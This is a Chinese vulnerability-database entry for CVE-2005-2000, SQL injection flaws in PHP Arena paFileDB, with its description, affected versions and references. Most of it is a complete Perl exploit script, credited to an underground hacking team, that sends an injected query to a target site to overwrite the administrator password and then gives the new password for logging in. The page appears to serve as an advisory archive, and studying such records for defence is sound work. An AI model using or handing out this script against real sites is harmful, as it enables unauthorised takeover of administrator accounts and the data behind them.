paFileDB 多个SQL注入漏洞

paFileDB 多个SQL注入漏洞

漏洞ID 1108864 漏洞类型 SQL注入
发布时间 2005-06-15 更新时间 2005-06-15
图片[1]-paFileDB 多个SQL注入漏洞-安全小百科CVE编号 CVE-2005-2000
图片[2]-paFileDB 多个SQL注入漏洞-安全小百科CNNVD-ID CNNVD-200506-133
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1050
https://www.securityfocus.com/bid/89149
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-133
|漏洞详情
paFileDB3.1及早期版本中存在多个SQL注入漏洞,远程攻击者可借助:(1)登录表单,(2)组登录表单,或(3)auth.php脚本中的formname参数,或(4)pafiledb.php脚本的select参数,(5)id参数,或(6)query参数,或(7)search.php脚本中的string参数,来执行任意SQL指令。
|漏洞EXP
#!/usr/bin/perl
######################################################################################
#        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m           #
######################################################################################
#  EXPLOIT FOR:   PHP Arena paFileDB 1.1.3 And 0lder                                 #
#                                                                                    #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v)                               #
#Email: [email protected]                                               #
#                                                                                    #
#                                                                                    #
# + Discovered By: GulfTech                                                          #
# + Advisory: http://www.securityfocus.com/bid/13967                                 #
#Vulnerable:   PHP Arena paFileDB 1.1.3 and Older                                    #
######################################################################################
# GR33tz T0 ==>     mh_p0rtal  --  oil_Karchack  --  Dr_CephaleX  -- Str0ke          #
#And Iranian Security & Hacking Groups:                                              #
#                                                                                    #
#      Crouz ,  Simorgh-ev   , IHSsecurity , AlphaST , Shabgard &  Emperor           #
######################################################################################

use IO::Socket;
if (@ARGV < 2)
{
  print "n====================================================n";
  print " n       PHPArena Exploit By Alpha Programmernn";
  print "       Trap-Set Underground Hacking Team      nn";
  print "           Usage: <T4rg3t> <DIR>nn";
  print "====================================================nn";
  print "Examples:nn";
  print "    xpl.pl www.Site.com / n";
  exit();
}

my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "nn[+] C0nn3ctedn";
$http = "pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20c15c493548d09ffd03c9d41d8bbbfeef%281337%28%20WHERE%201/*n";
$http .= "Host: $hostnrnr";
print "[+] Injecting SQL Commands ...n";
sleep(1);
print "[+] Changing Admin's Password ...n";
print $remote $http;
sleep(1);
while (<$remote>)
{
}
print "[+] Now , Login With This Password :n";
print "Password : trapsetnn";
print "Enjoy ;) nn";

# milw0rm.com [2005-06-15]
|受影响的产品
PHP Arena paFileDB 2.1.1

PHP Arena paFileDB 1.1.3

PHP Arena paFileDB 3.1

PHP Arena paFileDB 3.0 Beta 3.1

PHP Arena paFileDB 3.0

|参考资料

来源:www.phparena.net
链接:http://www.phparena.net/pafiledb_patch/
来源:www.phparena.net
链接:http://www.phparena.net/
来源:MISC
名称:http://www.gulftech.org/?node=research&article;_id=00082-06142005
链接:http://www.gulftech.org/?node=research&article;_id=00082-06142005
来源:BUGTRAQ
名称:20050615MultiplepaFileDBVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111885787217807&w;=2

相关推荐: bzip2解压文件权限不安全漏洞

bzip2解压文件权限不安全漏洞 漏洞ID 1204343 漏洞类型 未知 发布时间 2002-05-20 更新时间 2005-05-02 CVE编号 CVE-2002-0760 CNNVD-ID CNNVD-200208-064 漏洞平台 N/A CVSS评…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享